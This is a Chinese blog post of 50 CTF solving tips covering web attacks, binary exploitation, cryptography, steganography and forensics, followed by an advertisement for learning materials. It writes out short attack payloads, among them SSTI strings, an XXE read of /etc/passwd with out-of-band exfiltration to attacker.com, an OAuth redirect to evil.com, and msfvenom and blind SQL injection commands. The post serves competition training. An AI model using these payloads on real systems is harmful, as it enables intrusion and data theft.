CTF 竞赛干货|50 个实战解题思路,收藏一篇就够用
CTF选手必藏的50个实战解题思路!一篇够用!
CTF竞赛的核心逻辑
- •核心目标:快速拆解问题(Flag导向)、工具链协作、模式化思维。
- •关键原则:先广度后深度(优先收集信息)、分治策略(拆解复杂任务)。
四大模块:50 个 CTF 实战解题思路
这部分是核心!涵盖 Web 安全、逆向工程与 PWN、密码学与隐写术、MISC 与编程,每个思路都附具体操作技巧,直接能用~
(一)Web 安全:15 个高频漏洞解题思路
Web 是 CTF 最常考的模块,以下 15 个思路覆盖 80% 高频漏洞,建议逐个吃透:
- SQL 注入绕过 WAF
- 利用 MySQL 特性:用
/*!50000注释*/混淆语句(比如SELECT /*!50000FROM*/ users); - 字符替换:用
CONCAT(CHAR(115),CHAR(101))代替明文字符串(CHAR(115)是s,CHAR(101)是e,合起来是se)。
- SSTI 模板注入
- Flask/Jinja2 框架:通过
{{''.__class__.__mro__[1].__subclasses__()}}调用危险类; - Twig 模板:用
{{_self.env.registerUndefinedFilterCallback("exec")}}执行系统命令。
- 文件包含漏洞利用
- PHP 伪协议:用
php://input读取 POST 原始数据,直接写入 Webshell; - 日志包含:利用
logrotate日志(如/proc/self/environ)泄露服务器路径,再包含日志 getshell。
- JWT 伪造攻击
- 算法置空:修改 Header 中
alg为none(需删除签名字段,仅适用于未校验算法的场景); - 弱密钥破解:用工具
hashcat -m 16500爆破 JWT 密钥(-m 16500是 JWT 的哈希类型)。
- XXE 漏洞利用
- 本地文件读取:通过
<!ENTITY xxe SYSTEM "file:///etc/passwd">读取系统敏感文件; - 外带数据(OOB):用
http://attacker.com/?data=%xxe;将数据发送到自己的服务器,避免无回显场景。
- CSRF 绕过同源策略构造自动提交的恶意 HTML 表单,再用
<img src="[目标URL]">触发 GET 请求(img 标签加载时会自动发起请求,无需用户点击)。 - SSRF 内网探测利用
gopher://协议攻击内网 Redis 未授权访问:构造 gopher 数据流,往 Redis 写入 SSH 公钥,后续通过 SSH 登录服务器。 - 反序列化漏洞
- PHP:利用
__destruct()(对象销毁时触发)或__wakeup()(反序列化时触发)魔术方法构造攻击链; - Java:借助 Commons-Collections 库的
InvokerTransformer类执行命令(经典反序列化链)。
- Cookie 伪造Flask 框架 Session 伪造:已知 SECRET_KEY 后,用工具
flask-unsign生成恶意 Cookie(命令:flask-unsign --sign --cookie "{'username':'admin'}" --secret "your_key")。 - CORS 配置错误修改 HTTP 请求头
Origin: target.com(目标网站域名),欺骗服务器返回 “允许跨域”,从而窃取敏感数据(如用户信息)。 - HTTP 请求走私利用
Transfer-Encoding: chunked与Content-Length头冲突:给前端服务器发Transfer-Encoding头,给后端发Content-Length头,绕过网关限制。 - 目录穿越读取文件绕过路径过滤:用
....//(多段…/ 拼接)或 URL 编码%2e%2e%2f(%2e是.,%2f是/)代替../。 - Web 缓存投毒篡改
X-Forwarded-Host头:注入恶意脚本(如<script>alert(1)</script>),当服务器缓存页面后,其他用户访问时会触发脚本。 - OAuth 登录劫持伪造回调 URL:在 OAuth 授权流程中,修改
redirect_uri=http://evil.com(自己的恶意域名),窃取用户授权码,进而登录用户账号。 - 浏览器特性滥用用
<link rel="prefetch" href="secret.php">预加载敏感页面:浏览器会自动请求secret.php,若页面依赖登录态,可通过流量捕获登录信息。
(二)逆向工程与 PWN:12 个核心解题技巧
逆向和 PWN 对编程基础要求高,但掌握以下技巧,能快速突破关键逻辑:
- 函数定位技巧在 IDA 中搜索关键词:直接搜
"flag"、"correct"、"wrong"等字符串,定位判断 Flag 正确性的关键函数。 - 栈溢出利用计算偏移量:用
cyclic 200生成 cyclic 字符串(如aaaabaaacaaadaaa...),发送后通过dmesg查看崩溃地址,反推缓冲区偏移。 - 格式化字符串漏洞利用
%n写入数据:%n会将已输出的字符数写入指定地址,可修改 GOT 表(全局偏移表),将函数地址替换为 system 地址。 - 堆利用(UAF/Double Free)
- UAF(释放后重用):释放堆块后不置空指针,继续使用该指针修改虚表(vtable),劫持程序控制流;
- Double Free:重复释放同一堆块,破坏堆结构,申请时获取恶意堆块。
- ROP 链构造用工具
ROPgadget --binary ./pwn提取可执行文件中的 “gadgets”(如pop ret、mov eax, 0x0),拼接成 ROP 链,执行系统命令。 - 反调试绕过修改
/proc/self/status:将TracerPid字段改为 0(表示无调试器跟踪),欺骗程序的反调试检查。 - 动态 Hook 技术用
LD_PRELOAD劫持函数:编写自定义的strcmp()函数(比如直接返回 0,即 “比较相等”),通过LD_PRELOAD=./my_strcmp.so ./pwn加载,绕过密码校验。 - Shellcode 编写生成无空字符的 Shellcode:用
msfvenom -b '\x00' -p linux/x86/exec CMD=/bin/sh -f elf(-b '\x00'表示排除空字符,避免被过滤)。 - 整数溢出利用触发符号错误:比如
size = -1(当size是无符号整数时,-1会变成最大值),绕过if (size <= 100)的长度检查。 - Angr 符号执行自动化求解路径:对于 “迷宫题”“多分支判断题”,用 Angr 模拟程序执行,自动找到能走到
flag的路径(无需手动分析分支)。 - Patch 二进制文件用 Binary Ninja 修改跳转条件:比如将
jz(等于则跳转)改为jnz(不等于则跳转),跳过错误判断,直接输出 Flag。 - 侧信道攻击利用时间差爆破:逐字符判断密码正确性 —— 输入正确字符时,程序处理时间更长(需执行后续逻辑),通过时间差反推密码。
(三)密码学与隐写术:13 个破解思路
密码学和隐写术常考 “识别算法 + 工具破解”,记住这些套路能省很多时间:
- Base 家族识别
- Base64:末尾有
=(1-2 个),字符含大小写字母、数字、+、/; - Base32:仅含大写字母、数字 2-7;
- Base58:无 0、O、I、l(避免混淆),常见于区块链地址。
- RSA 低指数攻击当公钥指数
e=3且明文较短时,直接对密文c开立方(m = c^(1/3)),无需私钥即可解出明文m。 - RSA 共模攻击同一明文用不同公钥(相同模数
n,不同指数e1/e2)加密,得到c1、c2,通过扩展欧几里得算法求e1和e2的逆元,恢复明文。 - 哈希长度扩展攻击利用 SHA1/MD5 的填充机制:已知
hash(secret + data),可在data后追加任意内容,伪造新的哈希值(工具:hash_extender)。 - 培根密码5 位二进制对应字母:A=AAAAA,B=AAAAB,…,Z=BBBBB,将密文按 5 位分组,对照解密。
- 词频分析破解英文单表替换密码:统计密文中高频字符(对应英文中的 E、T、A),逐步替换验证,还原明文。
- LSB 隐写提取用
Stegsolve.jar分析图片:打开图片后切换到 “RGB Bits” 视图,查看红、绿、蓝通道的最低位(LSB),提取隐藏的二进制数据。 - 音频隐写用 Audacity 查看频谱图:导入音频后切换到 “频谱图” 模式,寻找异常的亮线(可能是摩尔斯电码或二进制数据)。
- ZIP 伪加密破解用
zipdetails分析 ZIP 文件头:伪加密的 ZIP 会在 “全局方式位标记” 字段设置错误的加密标记,修改该字段为 0(无加密)即可解压。 - PDF 隐写
- 提取隐藏文本:用
pdftotext -layout 隐写.pdf 输出.txt,查看是否有隐藏在空白处的文本; - 检查对象流:用
pdf-parser.py解析 PDF,查看/FlateDecode压缩的对象流,解压后可能有 Flag。
- NTFS 数据流隐藏用
dir /R查看 ADS(Alternate Data Stream):NTFS 支持文件附加数据流,隐藏的数据会显示为文件名:隐藏流名:$DATA,用more < 文件名:隐藏流名读取。 - PNG 文件修复手动修复文件头:PNG 的正确文件头是
89 50 4E 47 0D 0A 1A 0A,若文件头被篡改,替换为正确头后,再修复 CRC 校验(用工具pngcheck检测错误位置)。 - 二维码数据提取用
zbarimg扫描模糊二维码:即使二维码残缺或模糊,zbarimg -q 二维码.png也可能识别出数据(-q表示安静模式,只输出结果)。
(四)MISC 与编程:10 个实用解题方法
MISC 涵盖范围广,核心是 “细心 + 工具熟练度”,这 10 个思路能应对大部分题目:
- 编码转换自动化用 Python 脚本批量处理:比如 Hex→Base64→URL 解码,避免手动多次转换(示例:
import binascii, base64, urllib.parse; print(urllib.parse.unquote(base64.b64decode(binascii.unhexlify("666C6167")))))。 - **流量分析(Wireshark)**过滤 HTTP 流:用过滤条件
http.request.method == "POST"筛选 POST 请求,查看表单数据;或tcp contains "flag"搜索含 Flag 的流量包。 - **内存取证(Volatility)**提取进程列表:
volatility -f dump.raw pslist(dump.raw是内存镜像文件),定位可疑进程(如cmd.exe、nc.exe),再提取进程内存找 Flag。 - 社会工程学信息收集通过 WHOIS 查询域名:用
whois target.com获取域名注册人邮箱、电话、注册时间,可能作为解题线索(比如邮箱后缀作为密码)。 - 正则表达式暴力提取快速匹配 Flag 格式:用
grep -oE 'flag{[a-zA-Z0-9_]+}' 目标文件(-o只输出匹配部分,-E启用正则,匹配flag{}格式的内容)。 - 时间盲注自动化写 Python 脚本爆破:结合
requests库发送请求,通过 “响应时间” 判断字符是否正确(比如输入' AND IF(substr(flag,1,1)='a', sleep(5), 0) --+,若延迟 5 秒则表示首字符是a)。 - Git 泄露利用恢复源码:先访问
/.git/HEAD确认存在 Git 泄露,再用git-dumper http://target.com/.git/ 本地目录下载.git 文件夹,执行git checkout .恢复源码。 - DNS 隧道检测分析长域名请求:DNS 隧道会将数据编码成域名(如
abcd1234.evil.com,abcd1234是 Base64 编码的内容),用 Wireshark 过滤dns.qry.name contains "evil.com"查看。 - Excel 宏代码提取解压 XLSM 文件:将
.xlsm改为.zip并解压,查看xl/vbaProject.bin文件,用oledump.py提取其中的 VBA 宏代码(可能藏有 Flag 或解密逻辑)。 - PDF 混淆绕过解压 PDF 对象流:用
qpdf --stream-data=uncompress 混淆.pdf 解压后.pdf,将压缩的对象流解压,再搜索flag或查看异常文本。
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
**读者福利 |**CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**
我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。
L1级别:网络安全的基础入门
L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。
L2级别:网络安全的技术进阶
L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。
L3级别:网络安全的高阶提升
L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。
L4级别:网络安全的项目实战
L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题
整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。
二、技术文档和经典PDF书籍
书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)

三、网络安全视频教程
对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识。
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
四、网络安全护网行动/CTF比赛
学以致用,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。

五、网络安全工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

面试不仅是技术的较量,更需要充分的准备。
在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。
如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…